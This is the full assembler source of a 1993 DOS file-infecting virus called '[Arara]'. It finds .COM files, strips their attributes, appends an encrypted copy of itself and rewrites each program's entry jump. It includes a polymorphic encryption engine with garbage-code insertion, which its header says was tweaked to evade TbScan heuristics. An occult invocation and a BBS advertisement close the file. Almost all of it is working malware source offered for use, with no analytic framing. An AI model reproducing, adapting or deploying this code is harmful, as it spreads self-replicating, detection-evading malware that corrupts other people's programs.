;
		; [Arara] Virus
		; Generated by [TVG]
		; Minor modifications done to avoid heuristic detection by TbScan
		; Cloaked with a minor polymorphic protection device
		; Created on Monday November 11, 1993
		; Written for compilation in A86 pd assembler
		;
		; This is not a major virus, but I want to see how they react in the Virus
		; summary. Maybe they say it's from Bulgaria because of the language. Well,
		; if you want me to write something (fairly neutral) about satanism for a mag
		; then say it so. I try to keep it interesting...
		;
		;       John Tardy


		JMP	MAIN
		DB	'ž'
MAIN:		CALL	GETOFS
GETOFS:		MOV	BP,SP
		MOV	BP,SS:[BP]
		PUSH	AX
		SUB	BP,GETOFS
MAINVIR		EQU	$
		CALL	RANDOMIZE
		MOV	AX,[ORGPRG][BP]
		LEA	DI,100H
		STOSW
		MOV	AX,[ORGPRG][2][BP]
		STOSW
		MOV	AH,1AH
		MOV	DX,0FD00H
		INT	21H
		CALL	CHANGE

		MOV	AH,4EH
SEARCH:		LEA	DX,FILESPEC[BP]
		XOR	CX,CX
		INT	21H
		JNC	NOERROR
		JMP	READY
NOERROR:	MOV	AX,4300H
		MOV	DX,0FD1EH
		INT	21H
		PUSH	CX
		MOV	AX,4301H
		XOR	CX,CX
		INT	21H
		MOV	AX,3D02H
		MOV	DX,0FD1EH
		INT	21H
		XCHG	AX,BX
		MOV	AX,5700H
		INT	21H
		PUSH	CX
		PUSH	DX
		MOV	AH,3FH
		LEA	DX,ORGPRG[BP]
		MOV	CX,4
		INT	21H
		MOV	CX,W ORGPRG[BP]
		XOR	CX,0FFFFH
		CMP	CX,0B2A5H
		JE	EXEFILE
		CMP	CX,0A5B2H
		JE	EXEFILE
		CMP	B ORGPRG[BP][3],'ž'
		JE	EXEFILE
		MOV	AX,4202H
		XOR	CX,CX
		CWD
		INT	21H
		SUB	AX,3
		MOV	JUMP[1][BP],AX
		PUSH	BX
		PUSH	AX
		CALL	CHANGE
		MOV	DS,CS
		LEA	SI,MAIN[BP]
		MOV	CX,VIRLEN
		MOV	ES,CS
		LEA	DI,START[BP]
		POP	DX
		ADD	DX,103H
		MOV	AX,3

		CALL	ENCRYPT

		POP	BX
		MOV	AH,40H
		MOV	DS,CS
		LEA	DX,START[BP]
		INT	21H

		MOV	AX,4200H
		XOR	CX,CX
		CWD
		INT	21H
		MOV	AH,40H
		LEA	DX,JUMP[BP]
		MOV	CX,4
		INT	21H
		CALL	CLOSE
		JMP	READY
EXEFILE:	CALL	CLOSE
		MOV	AH,4FH
		JMP	SEARCH
READY		EQU	$
ERROR:		MOV	AH,1AH
		MOV	DX,80H
		INT	21H
		MOV	DS,CS
		POP	AX
		MOV	BX,0FEFFH
		XOR	BX,0FFFFH
		JMP	BX
CLOSE:		POP	SI
		POP	DX
		POP	CX
		MOV	AX,5700H
		INC	AX
		INT	21H
		MOV	AH,3EH
		INT	21H
		POP	CX
		MOV	AX,4300H
		INC	AX
		MOV	DX,0FD1EH
		INT	21H
		MOV	DS,CS
		MOV	ES,CS
		PUSH	SI
		RET
		DB	'[ARARA]'
CHANGE:		MOV	AX,W WEXL[BP]
		XCHG	AL,AH
		MOV	W WEXL[BP],AX
		RET

		;---------------------------------------------------------------------------
		;
		; Encryption engine
		;
		;---------------------------------------------------------------------------

RANDOMIZE:	MOV	CX,MTLEN
INCREASE:	MOV	SI,CX
		INC	B MT[SI][-1][BP]
		LOOP	INCREASE
CHECKIT:	MOV	CX,MTMAXLEN
CHECKVAL:	MOV	SI,CX
		MOV	AH,MT[SI][-1][BP]
		MOV	AL,MTMAX[SI][-1][BP]
		CMP	AH,AL
		JB	GOODVAL
		MOV	B MT[SI][-1][BP],0
GOODVAL:	LOOP	CHECKVAL
		XOR	AX,AX
		MOV	DS,AX
NOTZERO:	MOV	AL,B DS:[046CH]
		OR	AL,AL
		JZ	NOTZERO
		MOV	DS,CS
		MOV	ENCRYPTVAL[BP],AL
		RET

DUMMY1		DW	0		; offset mov bx,si,di
DUMMY2		DW	0		; offset loop
CALNEWCX	DW	0

ENCRYPT:	PUSH	DS
		PUSH	SI
		PUSH	CX

		MOV	AMOUNT[BP],AX

		MOV	COUNTLOOP[BP],CX

		MOV	CALNEWCX[BP],DI

		LEA	SI,MT[BP]

		CALL	INSERTGARBAGE
		XOR	AX,AX

		LODSB
		PUSH	AX
		LEA	BX,VAL2T[BP]
		CALL	USETABLE
		ADD	AX,W [COUNTLOOP][BP]
		STOSW
		LODSB
		PUSH	AX
		CALL	INSERTGARBAGE
		LEA	BX,VAL3SUB[BP]
		CALL	USETABLE
		POP	AX
		SHL	AX,2
		POP	BX
		ADD	AX,BX
		LEA	BX,VAL3T[BP]
		CALL	USETABLE
		CALL	INSERTGARBAGE

		LODSB
		PUSH	AX
		PUSH	AX
		LEA	BX,VAL1T[BP]
		CALL	USETABLE
		MOV	DUMMY1[BP],DI
		STOSW
		CALL	INSERTGARBAGE

		MOV	DUMMY2[BP],DI
		LODSB
		LEA	BX,VAL4T[BP]
		CALL	USETABLE
		POP	BX
		LODSB
		MOV	FUNCTION[BP],AL
		SHL	AX,2
		ADD	AX,BX
		LEA	BX,VAL5T[BP]
		CALL	USETABLE
		MOV	AL,B [ENCRYPTVAL][BP]
		STOSB
		CALL	INSERTGARBAGE
		POP	AX
		LEA	BX,VAL6T[BP]
		CALL	USETABLE
		LODSB
		LEA	BX,VAL7T[BP]
		CALL	USETABLE
		MOV	AX,DI
		MOV	BX,DUMMY2[BP]
		SUB	AX,BX
		NOT	AX
		STOSB
		PUSH	DI
		MOV	AX,CALNEWCX[BP]
		SUB	DI,AX
		ADD	DI,DX
		MOV	AX,DI
		MOV	DI,DUMMY1[BP]
		STOSW
		POP	DI

		POP	CX
		POP	SI
		POP	DS

CODEIT:		LODSB
		CMP	B FUNCTION[BP],0
		JNE	WHATELSE1
		XOR	AL,ENCRYPTVAL[BP]
		JMP	NOELSE
WHATELSE1:	CMP	B FUNCTION[BP],1
		JNE	WHATELSE2
		SUB	AL,ENCRYPTVAL[BP]
		JMP	NOELSE
WHATELSE2:	ADD	AL,ENCRYPTVAL[BP]
NOELSE:		STOSB
		LOOP	CODEIT
		MOV	CX,CALNEWCX[BP]
		SUB	DI,CX
		MOV	CX,DI
		RET

USETABLE:
		XLAT
		STOSB
		RET

INSERTGARBAGE:	PUSH	DS
		PUSH	SI
		PUSH	AX
		PUSH	CX
		PUSH	DS
		PUSH	SI
		XOR	AX,AX
		MOV	DS,AX
		MOV	AX,WORD PTR DS:[046CH]
		ADD	AX,DI
		SUB	AX,SI
		ADD	AX,BP
		ADD	AX,WORD PTR CS:[DI][BP]
		ADD	AL,AH
		ADD	AX,CX
		AND	AX,02H
AMOUNT		EQU	$-2
		MOV	CX,AX
		AND	AX,7H
		POP	SI
		POP	DS
		CMP	CX,0
		JE	NOGARBAGE
INSERT:		LEA	BX,RANDOMCODE[BP]
		CALL	USETABLE
		ADD	AX,DI
		ADD	AX,SI
		ADD	AX,WORD PTR CS:[DI][BP]
		AND	AX,7
		LOOP	INSERT
NOGARBAGE:	POP	CX
		POP	AX
		POP	SI
		POP	DS
		RET

MTMAX		DB	4		; MT 0
		DB	10		; MT 1
		DB	3		; MT 2
		DB	2		; MT 4
		DB	3		; MT 5
		DB	2		; MT 6
		DB	6		; MT 7
MTMAXLEN	EQU	$-MTMAX

MT		DB	0		; MT 0
		DB	0		; MT 1
		DB	0		; MT 2
		DB	0		; MT 4
		DB	0		; MT 5
		DB	0		; MT 6
		DB	0		; MT 7
MTLEN		EQU	$-MT

		; Offset Encrypted part
ENCOFS		DW	0

		; Counterloop decryption
COUNTLOOP	DW	0

		; Encryption Valua
ENCRYPTVAL	DB	0

		; Function
FUNCTION	DB	0		; 0=xor, 1=add, 2=sub (xchange in encr)

		;               MT 0
VAL1T		DB	0BBH,0BEH,0BFH	; Mov Bx,Si,Di

		;               MT 1
VAL2T		DB	0B8H,0BBH,0BAH,0BDH ; Mov Ax,Bx,Dx,Bp

		;               MT 2 V
VAL3SUB		DB	089H, 087H, 087H, 031H, 001H, 009H

		DB	08BH, 033H, 003H, 00BH ; NIEUW

		;               MT 1 H
VAL3T		DB	0C1H,0D9H,0D1H,0E9H ; Mov Ax,Bx,Dx,Bp       -> Cx
		DB	0C1H,0CBH,0CAH,0CDH ; Xchg Ax,Bx,Dx,Bp      -> Cx
		DB	0C1H,0D9H,0D1H,0E9H ; Xchg Ax,Bx,Dx,Bp      <- Cx
		DB	0C1H,0D9H,0D1H,0E9H ; Xor Ax,Bx,Dx,Bp       -> Cx
		DB	0C1H,0D9H,0D1H,0E9H ; Add Ax,Bx,Dx,Bp       -> Cx
		DB	0C1H,0D9H,0D1H,0E9H ; Or Ax,Bx,Dx,Bp        -> Cx

		DB	0C8H,0CBH,0CAH,0CDH ; NIEUW
		DB	0C8H,0CBH,0CAH,0CDH ;
		DB	0C8H,0CBH,0CAH,0CDH ;
		DB	0C8H,0CBH,0CAH,0CDH ;



		;               MT 4 H
VAL4T		DB	080H,082H	; 00 / 0000

		;               MT 5 V
		;               MT 0 H
VAL5T		DB	037H,034H,035H,037H ; Xor Bx,Si,Di,bx
		DB	007H,004H,005H,007H ; Add Bx,Si,Di,bx
		DB	02FH,02CH,02DH,02FH ; Sub Bx,Si,Di,bx

		;               MT 0 H
VAL6T		DB	043H,046H,047H	; Inc Bx,Si,Di

		;               MT 6 H
VAL7T		DB	0E0H,0E2H	; Loop Equal Functions

		;               MT 7 H
RANDOMCODE	DB	0FCH,0F8H,090H,0F9H,0F5H ; Random code
		DB	0CCH,0FBH,02EH,0F5H


FILESPEC	DB	'*.OCM',0
WEXL		EQU	FILESPEC+2
JUMP		DB	0E9H
		DW	0
		DB	'ž'
ORGPRG		DB	0CDH,020H,'AR'

		;
		; The Eighteenth Enochian Key opens the gates of Hell and casts up Lucifer
		; and his blessing.
		;
		; Enochian
DB		13,10,'ILASA MICALAZODA OLAPIRETA IALPEREJI BELIORE: DAS ODO BUSADIRE OIAD OUOARESA'
DB		13,10,'CAOSAGO: CASAREMEJI LAIADA ERANU BERINUTASA CAFAFAME DAS IVEMEDA AQOSO ADOHO'
DB		13,10,'MOZ, OD MAOFASA. BOLAPE COMO BELIORETA PAMEBETA. ZODACARE OD ZODAMERANU! ODO'
DB		13,10,'CICALE QAA. ZODOREJE, LAPE ZODIREDO NOCO MADA, HOATHAHE SAITAN!'
		; English
		;   O thou mighty light and burning flame of comfort!, that unveilest the glory
		;   of Satan to the center of the Earth; in whom the great secrets of truth
		;   have their abiding; that is called in thy kingdom: "strength through joy,"
		;   and is not to be measured. Be thou a window of comfort unto me. Move there-
		;   fore, and appear! Open the mysteries of your creation! Be friendly unto me,
		;   for I am the same!, the true worshipper of the highest end ineffable King
		;   of Hell!
START		EQU	$



VIRLEN		EQU	$-MAIN


;  ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;  ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> ReMeMbEr WhErE YoU sAw ThIs pHile fIrSt <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;  ÄÄÄÄÄÄÄÄÄÄÄ> ArReStEd DeVeLoPmEnT +31.77.SeCrEt H/p/A/v/AV/? <ÄÄÄÄÄÄÄÄÄÄÄ
;  ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ